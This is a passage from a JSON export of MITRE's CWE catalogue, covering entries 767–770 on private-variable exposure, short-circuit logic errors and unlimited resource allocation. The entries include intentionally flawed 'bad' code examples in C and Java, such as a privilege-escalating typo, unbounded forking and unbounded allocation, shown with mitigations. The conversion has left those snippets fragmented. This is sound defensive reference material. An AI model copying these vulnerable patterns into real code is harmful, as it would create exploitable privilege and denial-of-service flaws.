Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Likelihood_of_Exploit, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Common_Consequences, Description, Name, References, Relationships, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Critical Variable Declared Public","attr":{"@_Date":"2019-01-03"}}}},"767":{"attr":{"@_ID":"767","@_Name":"Access to Critical Private Variable via Public Method","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software defines a public method that reads or modifies a private variable.","Extended_Description":"If an attacker modifies the variable to contain unexpected values, this could violate assumptions from other parts of the code. Additionally, if an attacker can read the private variable, it may expose sensitive information or make it easier to launch further attacks.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"668","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C#","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Other"],"Impact":["Modify Application Data","Other"]}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Use class accessor and mutator methods appropriately. Perform validation when accepting data from a public method that is intended to modify a critical private variable. Also be sure that appropriate access controls are being applied when a public method interfaces with critical data."}},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The following example declares a critical variable to be private, and then allows the variable to be modified by public methods.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C++"},"xhtml:div":{"#text":"private: float price;public: void changePrice(float newPrice) {}","xhtml:br":"","xhtml:div":{"#text":"price = newPrice;","attr":{"@_style":"margin-left:10px;"}}}}},{"Intro_Text":"The following example could be used to implement a user forum where a single user (UID) can switch between multiple profiles (PID).","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public class Client {}","xhtml:div":{"#text":"private int UID;public int PID;private String userName;public Client(String userName){}public void setPID(int ID) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","",""],"xhtml:div":[{"#text":"PID = getDefaultProfileID();UID = mapUserNametoUID( userName );this.userName = userName;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]},{"#text":"UID = ID;","attr":{"@_style":"margin-left:10px;"}}]}}},"Body_Text":"The programmer implemented setPID with the intention of modifying the PID variable, but due to a typo. accidentally specified the critical variable UID instead. If the program allows profile IDs to be between 1 and 10, but a UID of 1 means the user is treated as an admin, then a user could gain administrative privileges as a result of this typo."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Failure to protect stored data from modification"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP23","Entry_Name":"Exposed Data"},{"attr":{"@_Taxonomy_Name":"SEI CERT Perl Coding Standard"},"Entry_ID":"OOP31-PL","Entry_Name":"Do not access private variables or subroutines in other packages","Mapping_Fit":"Imprecise"}]},"Notes":{"Note":{"#text":"This entry is closely associated with access control for public methods. If the public methods are restricted with proper access controls, then the information in the private variable will not be exposed to unexpected parties. There may be chaining or composite relationships between improper access controls and this weakness.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2009-03-03"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Likelihood_of_Exploit, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Relationships"}]}},"768":{"attr":{"@_ID":"768","@_Name":"Incorrect Short Circuit Evaluation","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software contains a conditional statement with multiple logical expressions in which one of the non-leading expressions may produce side effects. This may lead to an unexpected state in the program after the execution of the conditional, because short-circuiting logic may prevent the side effects from occurring.","Extended_Description":{"xhtml:p":["Usage of short circuit evaluation, though well-defined in the C standard, may alter control flow in a way that introduces logic errors that are difficult to detect, possibly causing errors later during the software\'s execution. If an attacker can discover such an inconsistency, it may be exploitable to gain arbitrary control over a system.","If the first condition of an \\"or\\" statement is assumed to be true under normal circumstances, or if the first condition of an \\"and\\" statement is assumed to be false, then any subsequent conditional may contain its own logic errors that are not detected during code review or testing.","Finally, the usage of short circuit evaluation may decrease the maintainability of the code."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"691","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"Low","Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability"],"Note":"Widely varied consequences are possible if an attacker is aware of an unexpected state in the software after a conditional. It may lead to information exposure, a system crash, or even complete attacker control of the system."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Minimizing the number of statements in a conditional that produce side effects will help to prevent the likelihood of short circuit evaluation to alter control flow in an unexpected way."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following function attempts to take a size value from a user and allocate an array of that size (we ignore bounds checking for simplicity). The function tries to initialize each spot with the value of its index, that is, A[len-1] = len - 1; A[len-2] = len - 2; ... A[1] = 1; A[0] = 0; However, since the programmer uses the prefix decrement operator, when the conditional is evaluated with i == 1, the decrement will result in a 0 value for the first part of the predicate, causing the second portion to be bypassed via short-circuit evaluation. This means we cannot be sure of what value will be in A[0] when we return the array to the user.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"#define PRIV_ADMIN 0#define PRIV_REGULAR 1typedef struct{} user_t;user_t *Add_Regular_Users(int num_users){}int main(){}","xhtml:br":["","","",""],"xhtml:div":[{"#text":"int privileges;int id;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"user_t* users = (user_t*)calloc(num_users, sizeof(user_t));int i = num_users;while( --i &amp;&amp; (users[i].privileges = PRIV_REGULAR) ){}return users;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""],"xhtml:div":{"#text":"users[i].id = i;","attr":{"@_style":"margin-left:10px;"}}},{"#text":"user_t* test;int i;test = Add_Regular_Users(25);for(i = 0; i &lt; 25; i++) printf(\\"user %d has privilege level %d\\\\n\\", test[i].id, test[i].privileges);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""]}]}},"Body_Text":"When compiled and run, the above code will output a privilege level of 1, or PRIV_REGULAR for every user but the user with id 0 since the prefix increment operator used in the if statement will reach zero and short circuit before setting the 0th user\'s privilege level. Since we used calloc, this privilege will be set to 0, or PRIV_ADMIN."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Failure to protect stored data from modification"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP1","Entry_Name":"Glitch in computation"}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2009-03-03"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Likelihood_of_Exploit, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"769":{"attr":{"@_ID":"769","@_Name":"DEPRECATED: Uncontrolled File Descriptor Consumption","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Deprecated"},"Description":"This entry has been deprecated because it was a duplicate of CWE-774. All content has been transferred to CWE-774.","Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2009-05-08"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Maintenance_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Alternate_Terms, Description, Likelihood_of_Exploit, Name, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Alternate_Terms, Description, Likelihood_of_Exploit, Name, Potential_Mitigations, References, Relationships, Time_of_Introduction, Type"}],"Previous_Entry_Name":[{"#text":"File Descriptor Exhaustion","attr":{"@_Date":"2017-11-08"}},{"#text":"Uncontrolled File Descriptor Consumption","attr":{"@_Date":"2019-01-03"}}]}},"770":{"attr":{"@_ID":"770","@_Name":"Allocation of Resources Without Limits or Throttling","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software allocates a reusable resource or group of resources on behalf of an actor without imposing any restrictions on the size or number of resources that can be allocated, in violation of the intended security policy for that actor.","Extended_Description":{"xhtml:p":"Code frequently has to work with limited resources, so programmers must be careful to ensure that resources are not consumed too quickly, or too easily.  Without use of quotas, resource limits, or other protection mechanisms, it can be easy for an attacker to consume many resources by rapidly making many requests, or causing larger resources to be used than is needed. When too many resources are allocated, or if a single resource is too large, then it can prevent the code from working correctly, possibly leading to a denial of service."},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"400","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"665","@_View_ID":"1000"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"400","@_View_ID":"1003","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Often"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."},{"Phase":"Implementation"},{"Phase":"Operation"},{"Phase":"System Configuration"}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":"Availability","Impact":["DoS: Resource Consumption (CPU)","DoS: Resource Consumption (Memory)","DoS: Resource Consumption (Other)"],"Note":"When allocating resources without limits, an attacker could prevent other systems, applications, or processes from accessing the same type of resource."}},"Detection_Methods":{"Detection_Method":[{"attr":{"@_Detection_Method_ID":"DM-8"},"Method":"Manual Static Analysis","Description":"Manual static analysis can be useful for finding this weakness, but it might not achieve desired code coverage within limited time constraints. If denial-of-service is not considered a significant risk, or if there is strong emphasis on consequences such as code execution, then manual analysis may not focus on this weakness at all."},{"Method":"Fuzzing","Description":{"xhtml:p":["While fuzzing is typically geared toward finding low-level implementation bugs, it can inadvertently find uncontrolled resource allocation problems. This can occur when the fuzzer generates a large number of test cases but does not restart the targeted software in between test cases. If an individual test case produces a crash, but it does not do so reliably, then an inability to limit resource allocation may be the cause.","When the allocation is directly affected by numeric inputs, then fuzzing may produce indications of this weakness."]},"Effectiveness":"Opportunistic"},{"Method":"Automated Dynamic Analysis","Description":"Certain automated dynamic analysis techniques may be effective in producing side effects of uncontrolled resource allocation problems, especially with resources such as processes, memory, and connections. The technique may involve generating a large number of requests to the software within a short time frame. Manual analysis is likely required to interpret the results."},{"Method":"Automated Static Analysis","Description":{"xhtml:p":["Specialized configuration or tuning may be required to train automated tools to recognize this weakness.","Automated static analysis typically has limited utility in recognizing unlimited allocation problems, except for the missing release of program-independent system resources such as files, sockets, and processes, or unchecked arguments to memory. For system resources, automated static analysis may be able to detect circumstances in which resources are not released after they have expired, or if too much of a resource is requested at once, as can occur with memory. Automated analysis of configuration files may be able to detect settings that do not specify a maximum value.","Automated static analysis tools will not be appropriate for detecting exhaustion of custom resources, such as an intended security policy in which a bulletin board user is only allowed to make a limited number of posts per day."]}}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Requirements","Description":"Clearly specify the minimum and maximum expectations for capabilities, and dictate which behaviors are acceptable when resource allocation reaches limits."},{"Phase":"Architecture and Design","Description":"Limit the amount of resources that are accessible to unprivileged users. Set per-user limits for resources. Allow the system administrator to define these limits. Be careful to avoid CWE-410."},{"Phase":"Architecture and Design","Description":"Design throttling mechanisms into the system architecture. The best protection is to limit the amount of resources that an unauthorized user can cause to be expended. A strong authentication and access control model will help prevent such attacks from occurring in the first place, and it will help the administrator to identify who is committing the abuse. The login application should be protected against DoS attacks as much as possible. Limiting the database access, perhaps by caching result sets, can help minimize the resources expended. To further limit the potential for a DoS attack, consider tracking the rate of requests received from users and blocking requests that exceed a defined rate threshold."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]},"Effectiveness_Notes":"This will only be applicable to cases where user input can influence the size or frequency of resource allocations."},{"attr":{"@_Mitigation_ID":"MIT-15"},"Phase":"Architecture and Design","Description":"For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server."},{"Phase":"Architecture and Design","Description":{"xhtml:p":["Mitigation of resource exhaustion attacks requires that the target system either:","The first of these solutions is an issue in itself though, since it may allow attackers to prevent the use of the system by a particular valid user. If the attacker impersonates the valid user, they may be able to prevent the user from accessing the server in question.","The second solution can be difficult to effectively institute -- and even when properly done, it does not provide a full solution. It simply requires more resources on the part of the attacker."],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["recognizes the attack and denies that user further access for a given amount of time, typically by using increasing time delays","uniformly throttles all requests in order to make it more difficult to consume resources more quickly than they can again be freed."]}}}},{"Phase":"Architecture and Design","Description":"Ensure that protocols have specific limits of scale placed on them."},{"attr":{"@_Mitigation_ID":"MIT-38.1"},"Phase":["Architecture and Design","Implementation"],"Description":{"xhtml:p":["If the program must fail, ensure that it fails gracefully (fails closed). There may be a temptation to simply let the program fail poorly in cases such as low memory conditions, but an attacker may be able to assert control before the software has fully exited. Alternately, an uncontrolled failure could cause cascading problems with other downstream components; for example, the program could send a signal to a downstream process so the process immediately knows that a problem has occurred and has a better chance of recovery.","Ensure that all failures in resource allocation place the system into a safe posture."]}},{"attr":{"@_Mitigation_ID":"MIT-47"},"Phase":["Operation","Architecture and Design"],"Strategy":"Resource Limitation","Description":{"xhtml:p":["Use resource-limiting settings provided by the operating system or environment. For example, when managing system resources in POSIX, setrlimit() can be used to set limits for certain types of resources, and getrlimit() can determine how many resources are available. However, these functions are not available on all operating systems.","When the current levels get close to the maximum that is defined for the application (see CWE-770), then limit the allocation of further resources to privileged users; alternately, begin releasing resources for less-privileged users. While this mitigation may protect the system from attack, it will not necessarily stop attackers from adversely impacting other users.","Ensure that the application performs the appropriate error checks and error handling in case resources become unavailable (CWE-703)."]}}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-25"},"Intro_Text":"This code allocates a socket and forks each time it receives a new connection.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"sock=socket(AF_INET, SOCK_STREAM, 0);while (1) {}","xhtml:br":"","xhtml:div":{"#text":"newsock=accept(sock, ...);printf(\\"A connection has been accepted\\\\n\\");pid = fork();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}}},"Body_Text":"The program does not track how many connections have been made, and it does not limit the number of connections. Because forking is a relatively expensive operation, an attacker would be able to cause the system to run out of CPU, processes, or memory by making a large number of connections. Alternatively, an attacker could consume all available connections, preventing others from accessing the system remotely."},{"attr":{"@_Demonstrative_Example_ID":"DX-50"},"Intro_Text":"In the following example a server socket connection is used to accept a request to store data on the local file system using a specified filename. The method openSocketConnection establishes a server socket to accept requests from a client. When a client establishes a connection to this service the getNextMessage method is first used to retrieve from the socket the name of the file to store the data, the openFileToWrite method will validate the filename and open a file to write to on the local file system. The getNextMessage is then used within a while loop to continuously read data from the socket and output the data to the file until there is no longer any data from the socket.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int writeDataFromSocketToFile(char *host, int port){}","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"char filename[FILENAME_SIZE];char buffer[BUFFER_SIZE];int socket = openSocketConnection(host, port);if (socket &lt; 0) {}if (getNextMessage(socket, filename, FILENAME_SIZE) &gt; 0) {}closeSocket(socket);","xhtml:br":["","","","","","",""],"xhtml:div":[{"#text":"printf(\\"Unable to open socket connection\\");return(FAIL);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if (openFileToWrite(filename) &gt; 0) {}closeFile();","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"while (getNextMessage(socket, buffer, BUFFER_SIZE) &gt; 0){}","xhtml:div":{"#text":"if (!(writeToFile(buffer) &gt; 0))","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"break;","attr":{"@_style":"margin-left:10px;"}}}}},"xhtml:br":""}}]}}}},"Body_Text":"This example creates a situation where data can be dumped to a file on the local file system without any limits on the size of the file. This could potentially exhaust file or disk resources and/or limit other clients\' ability to access the service."},{"attr":{"@_Demonstrative_Example_ID":"DX-51"},"Intro_Text":"In the following example, the processMessage method receives a two dimensional character array containing the message to be processed. The two-dimensional character array contains the length of the message in the first character array and the message body in the second character array. The getMessageLength method retrieves the integer value of the length from the first character array. After validating that the message length is greater than zero, the body character array pointer points to the start of the second character array of the two-dimensional character array and memory is allocated for the new body character array.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int processMessage(char **message){}","xhtml:br":["","",""],"xhtml:i":"/* process message accepts a two-dimensional character array of the form [length][body] containing the message to be processed */","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"char *body;int length = getMessageLength(message[0]);if (length &gt; 0) {}else {}","xhtml:br":["","","","",""],"xhtml:div":[{"#text":"body = &amp;message[1][0];processMessageBody(body);return(SUCCESS);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]},{"#text":"printf(\\"Unable to process message; invalid message length\\");return(FAIL);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}]}}}},{"attr":{"@_Nature":"good","@_Language":"C"},"xhtml:div":{"#text":"unsigned int length = getMessageLength(message[0]);if ((length &gt; 0) &amp;&amp; (length &lt; MAX_LENGTH)) {...}","xhtml:br":""}}],"Body_Text":["This example creates a situation where the length of the body character array can be very large and will consume excessive memory, exhausting system resources. This can be avoided by restricting the length of the second character array with a maximum length check","Also, consider changing the type from \'int\' to \'unsigned int\', so that you are always guaranteed that the number is positive. This might not be possible if the protocol specifically requires allowing negative values, or if you cannot control the return value from getMessageLength(), but it could simplify the check to ensure the input is positive, and eliminate other errors such as signed-to-unsigned conversion errors (CWE-195) that may occur elsewhere in the code."]},{"attr":{"@_Demonstrative_Example_ID":"DX-52"},"Intro_Text":"In the following example, a server object creates a server socket and accepts client connections to the socket. For every client connection to the socket a separate thread object is generated using the ClientSocketThread class that handles request made by the client through the socket.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public void acceptConnections() {}","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"try {} catch (IOException ex) {...}","xhtml:div":{"#text":"ServerSocket serverSocket = new ServerSocket(SERVER_PORT);int counter = 0;boolean hasConnections = true;while (hasConnections) {}serverSocket.close();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","",""],"xhtml:div":{"#text":"Socket client = serverSocket.accept();Thread t = new Thread(new ClientSocketThread(client));t.setName(client.getInetAddress().getHostName() + \\":\\" + counter++);t.start();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""]}},"xhtml:br":["",""]}}}},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"public static final int SERVER_PORT = 4444;public static final int MAX_CONNECTIONS = 10;...public void acceptConnections() {}","xhtml:br":["","","","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"try {} catch (IOException ex) {...}","xhtml:div":{"#text":"ServerSocket serverSocket = new ServerSocket(SERVER_PORT);int counter = 0;boolean hasConnections = true;while (hasConnections) {}serverSocket.close();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","",""],"xhtml:div":{"#text":"hasConnections = checkForMoreConnections();Socket client = serverSocket.accept();Thread t = new Thread(new ClientSocketThread(client));t.setName(client.getInetAddress().getHostName() + \\":\\" + counter++);ExecutorService pool = Executors.newFixedThreadPool(MAX_CONNECTIONS);pool.execute(t);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","",""]}},"xhtml:br":["",""]}}}}],"Body_Text":["In this example there is no limit to the number of client connections and client threads that are created. Allowing an unlimited number of client connections and threads could potentially overwhelm the system and system resources.","The server should limit the number of client connections and the client threads that are created. This can be easily done by creating a thread pool object that limits the number of threads that are generated."]},{"Intro_Text":"An unnamed web site allowed a user to purchase tickets for an event. A menu option allowed the user to purchase up to 10 tickets, but the back end did not restrict the actual number of tickets that could be purchased.","References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-667"}}}},{"Intro_Text":"Here the problem is that every time a connection is made, more memory is allocated. So if one just opened up more and more connections, eventually the machine would run out of memory.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"bar connection() {}endConnection(bar foo) {}int main() {}","xhtml:div":[{"#text":"foo = malloc(1024);return foo;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"free(foo);","attr":{"@_style":"margin-left:10px;"}},{"#text":"while(1) {}endConnection(foo)","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"foo=connection();","attr":{"@_style":"margin-left:10px;"}},"xhtml:br":["",""]}],"xhtml:br":["","","",""]}}}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2009-4017","Description":"Language interpreter does not restrict the number of temporary files being created when handling a MIME request with a large number of parts..","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4017"},{"Reference":"CVE-2009-2726","Description":"Driver does not use a maximum width when invoking sscanf style functions, causing stack consumption.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2726"},{"Reference":"CVE-2009-2540","Description":"Large integer value for a length property in an object causes a large amount of memory allocation.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2540"},{"Reference":"CVE-2009-2054","Description":"Product allows exhaustion of file descriptors when processing a large number of TCP packets.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2054"},{"Reference":"CVE-2008-5180","Description":"Communication product allows memory consumption with a large number of SIP requests, which cause many sessions to be created.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5180"},{"Reference":"CVE-2008-1700","Description":"Product allows attackers to cause a denial of service via a large number of directives, each of which opens a separate window.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1700"},{"Reference":"CVE-2005-4650","Description":"CMS does not restrict the number of searches that can occur simultaneously, leading to resource exhaustion.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4650"},{"Reference":"CVE-2020-15100","Description":"web application scanner attempts to read an excessively large file created by a user, causing process termination","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15100"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"FIO04-J","Entry_Name":"Close resources when they are no longer needed"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"SER12-J","Entry_Name":"Avoid memory and resource leaks during serialization"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"MSC05-J","Entry_Name":"Do not exhaust heap space"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"125"}},{"attr":{"@_CAPEC_ID":"130"}},{"attr":{"@_CAPEC_ID":"147"}},{"attr":{"@_CAPEC_ID":"197"}},{"attr":{"@_CAPEC_ID":"229"}},{"attr":{"@_CAPEC_ID":"230"}},{"attr":{"@_CAPEC_ID":"231"}},{"attr":{"@_CAPEC_ID":"469"}},{"attr":{"@_CAPEC_ID":"482"}},{"attr":{"@_CAPEC_ID":"486"}},{"attr":{"@_CAPEC_ID":"487"}},{"attr":{"@_CAPEC_ID":"488"}},{"attr":{"@_CAPEC_ID":"489"}},{"attr":{"@_CAPEC_ID":"490"}},{"attr":{"@_CAPEC_ID":"491"}},{"attr":{"@_CAPEC_ID":"493"}},{"attr":{"@_CAPEC_ID":"494"}},{"attr":{"@_CAPEC_ID":"495"}},{"attr":{"@_CAPEC_ID":"496"}},{"attr":{"@_CAPEC_ID":"528"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-386"}},{"attr":{"@_External_Reference_ID":"REF-387"}},{"attr":{"@_External_Reference_ID":"REF-388"}},{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 17, &#34;Protecting Against Denial of Service Attacks&#34; Page 517"}},{"attr":{"@_External_Reference_ID":"REF-672"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 10, &#34;Resource Limits&#34;, Page 574"}}]},"Notes":{"Note":[{"#text":"This entry is different from uncontrolled resource consumption (CWE-400) in that there are other weaknesses that are related to inability to control resource consumption, such as holding on to a resource too long after use, or not correctly keeping track of active resources so that they can be managed and released when they are finished (CWE-771).","attr":{"@_Type":"Relationship"}},{"#text":"Vulnerability theory is largely about how behaviors and resources interact. \\"Resource exhaustion\\" can be regarded as either a consequence or an attack, depending on the perspective. This entry is an attempt to reflect one of the underlying weaknesses that enable these attacks (or consequences) to take place.","attr":{"@_Type":"Theoretical"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2009-05-13"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Detection_Factors, Observed_Examples, References, 